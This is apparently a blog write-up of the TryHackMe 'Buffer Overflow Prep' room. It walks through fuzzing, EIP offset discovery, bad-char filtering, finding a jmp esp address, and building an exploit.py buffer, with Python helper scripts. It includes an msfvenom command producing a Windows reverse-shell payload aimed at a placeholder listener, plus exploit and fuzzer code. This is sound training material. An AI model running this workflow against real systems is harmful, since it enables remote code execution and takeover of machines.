I put all the code on GitHub; give it a little star ><
https://github.com/stwater20/bufferoverflow-exploit
Room used: TryHackMe – Buffer Overflow Prep
https://tryhackme.com/room/bufferoverflowprep
This room uses a 32-bit Windows 7 VM with Immunity Debugger and Putty preinstalled. Windows Firewall and Defender have both been disabled to make exploit writing easier.
mona configuration
!mona config -set workingfolder c:\mona\%p
pattern_create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
Calculate EIP offset
!mona findmsp -distance 600
Response
EIP contains normal pattern : … (offset XXXX)
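The two commands above do one thing between them: send a cyclic pattern and look up where the four bytes that ended up in EIP sit inside it. The following is an added example, not code from the room or from the GitHub repo, that reproduces pattern_create.rb and the offset lookup of "!mona findmsp" in plain Python, so the offset can be cross-checked without Metasploit or Immunity. The EIP value 0x41356141 used at the bottom is a constructed value, not one taken from the target.

```python
#!/usr/bin/env python3
"""Cyclic pattern generation and EIP offset lookup (added example).
Same alphabet and ordering as Metasploit's pattern_create.rb."""
import string
import struct


def pattern_create(length):
    """Build the "Aa0Aa1Aa2..." pattern of the requested length.
    Each 3-byte triplet (upper, lower, digit) is unique for up to
    26*26*10*3 = 20280 bytes, so any 4-byte window pins down its offset."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip_value, length=600):
    """Offset of the 4 bytes that landed in EIP, or -1 if not found.
    eip_value is the register as shown in the debugger (e.g. 0x41356141).
    x86 is little-endian, so the register's bytes are reversed relative
    to the order they had in the buffer; struct.pack("<I") undoes that."""
    pattern = pattern_create(length)
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern.find(needle)


def pattern_offset_bytes(raw, length=600):
    """Same lookup from raw bytes already in buffer order, e.g. a few
    bytes copied from the dump at ESP."""
    return pattern_create(length).find(raw.decode("latin-1"))


if __name__ == "__main__":
    print(pattern_create(600))
    # constructed EIP value, equivalent to "Aa5A" in the buffer -> 15
    print("offset:", pattern_offset(0x41356141))
```

If pattern_offset returns -1, EIP was not overwritten by the pattern (the crash was somewhere else, or the pattern was shorter than the distance to the saved return address); re-fuzz with a longer pattern rather than guessing.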
Find bad char
!mona bytearray -b "\x00"
Compare bad chars
-a takes the address of ESP at the time of the crash, i.e. where the byte array was written
!mona compare -f C:\mona\oscp\bytearray.bin -a
Finding a Jump Point
!mona jmp -r esp -cpb "\x00"
Generate Payload
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c
NOPs
padding = "\x90" * 16
Code
Exploit.py
#!/usr/bin/env python3
import socket

ip = "MACHINE_IP"
port = 0            # port of the vulnerable service

prefix = ""         # command prefix the service expects before the data
offset = 0          # EIP offset from "!mona findmsp"
overflow = "A" * offset
retn = ""           # 4-byte jmp esp address, written little-endian (bytes reversed)
padding = ""        # NOP sled, e.g. "\x90" * 16
payload = ""        # msfvenom shellcode, generated with the bad chars excluded
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except OSError:
    print("Could not connect.")
finally:
    s.close()
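The Jump Point, Generate Payload and NOPs steps above all feed the one line in exploit.py that builds the buffer, and the two things that go wrong most often there are the byte order of the return address and a bad char sneaking into the address or the shellcode. The following is an added example, not the room's exploit.py, that assembles the same layout from bytes and refuses to build a buffer whose return address or payload contains a bad char. The prefix b"CMD ", the offset 100, the address 0x11223344 and the 8-byte INT3 payload are placeholders, not values from the target.

```python
#!/usr/bin/env python3
"""Assemble and sanity-check the exploit buffer (added example)."""
import struct

BAD_CHARS = b"\x00"   # extend with every byte "!mona compare" reported as bad


def find_bad_chars(data, bad=BAD_CHARS):
    """Return [(index, byte)] for every bad byte found in data."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def is_usable_address(addr, bad=BAD_CHARS):
    """A jmp esp address is only usable if none of its 4 bytes is a bad char;
    this is the same filter "!mona jmp -r esp -cpb" applies."""
    return not find_bad_chars(struct.pack("<I", addr), bad)


def build_buffer(prefix, offset, jmp_esp, payload, nops=16,
                 postfix=b"\r\n", bad=BAD_CHARS):
    """prefix + "A"*offset + <little-endian addr> + NOP sled + payload + postfix.
    Raises ValueError instead of sending something that cannot work."""
    if not is_usable_address(jmp_esp, bad):
        raise ValueError("jmp esp address 0x%08x contains a bad char" % jmp_esp)
    hits = find_bad_chars(payload, bad)
    if hits:
        raise ValueError("payload contains bad chars at %r" % hits)
    # x86 is little-endian: 0x11223344 must go on the wire as 44 33 22 11
    retn = struct.pack("<I", jmp_esp)
    return prefix + b"A" * offset + retn + b"\x90" * nops + payload + postfix


def layout(buf, prefix, offset):
    """Where EIP and ESP land inside buf, for checking against the debugger."""
    eip_at = len(prefix) + offset
    return {
        "eip_offset": eip_at,            # these 4 bytes overwrite EIP
        "retn": buf[eip_at:eip_at + 4],
        "esp_offset": eip_at + 4,        # ESP points here after the ret
    }


if __name__ == "__main__":
    # constructed placeholders: fake prefix, offset, address and payload
    buf = build_buffer(b"CMD ", 100, 0x11223344, b"\xcc" * 8)
    print(layout(buf, b"CMD ", 100))
```

The msfvenom output from "-f c" is a C array of "\x.." escapes; paste it into a bytes literal (b"\xfc\xe8...") so it goes through find_bad_chars as bytes rather than as text.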
fuzzer.py
#!/usr/bin/env python3
import socket, time, sys

ip = "xxx.xxx.xxx.xxx"
port = 0            # port of the vulnerable service
timeout = 5

prefix = ""         # command prefix the service expects before the data
string = prefix + "A" * 100

# send 100, 200, 300, ... bytes until the service stops answering
while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)
    except OSError:
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"
    time.sleep(1)
badchar.py
# print all byte values except \x00 as "\x.." escapes, for pasting into exploit.py
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()
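badchar.py only prints the byte list; the real work in the "Find bad char" and "Compare bad chars" steps is sending that list, dumping memory at ESP and spotting the first byte that did not survive, then repeating with that byte excluded. The following is an added example, not the room's code, that does the whole loop locally: make_bytearray() produces the same sequence "!mona bytearray" writes, compare() does what "!mona compare -f bytearray.bin -a <ESP>" does, and discover_bad_chars() iterates until the array comes back intact. The target behaviour in fake_target() is constructed (it strips 0x0a and mangles 0x0d) and stands in for sending the bytes to the real service and reading the dump from the debugger.

```python
#!/usr/bin/env python3
"""Bad-char discovery without mona (added example)."""


def make_bytearray(excluded=(0x00,)):
    """Every byte value 0x00-0xff except the excluded ones, in order.
    With 0x00 excluded this is exactly what badchar.py prints."""
    return bytes(b for b in range(256) if b not in excluded)


def as_escapes(data):
    """Render bytes as \\x.. escapes for pasting into exploit.py."""
    return "".join("\\x%02x" % b for b in data)


def compare(expected, dump):
    """First byte that did not survive the trip into the target, as
    (offset, expected_byte), or None if the whole array is intact.
    Only the first mismatch is trustworthy: a byte that is dropped or
    expanded shifts everything after it, so every later byte mismatches
    too. Exclude that one byte and run again."""
    for i, want in enumerate(expected):
        if i >= len(dump) or dump[i] != want:
            return (i, want)
    return None


def discover_bad_chars(round_trip, excluded=(0x00,)):
    """round_trip(array) -> bytes read back at ESP. Repeats send/compare,
    excluding one new byte per round, until the array comes back intact.
    Returns the sorted list of bad chars (the -b list for msfvenom)."""
    bad = set(excluded)
    while True:
        arr = make_bytearray(sorted(bad))
        hit = compare(arr, round_trip(arr))
        if hit is None:
            return sorted(bad)
        bad.add(hit[1])


def fake_target(data):
    """Constructed stand-in for the vulnerable service: it drops every 0x0a
    (line feed) and turns 0x0d into a space before the bytes reach the stack."""
    return data.replace(b"\x0a", b"").replace(b"\x0d", b"\x20")


if __name__ == "__main__":
    print(as_escapes(make_bytearray()))
    print("bad chars:", ["0x%02x" % b for b in discover_bad_chars(fake_target)])
```

Against a real target, round_trip is "send the array with exploit.py, then copy the bytes at ESP out of Immunity"; the loop logic is the same, and each round excludes exactly one more byte, which is why the bad-char list is found one byte per crash.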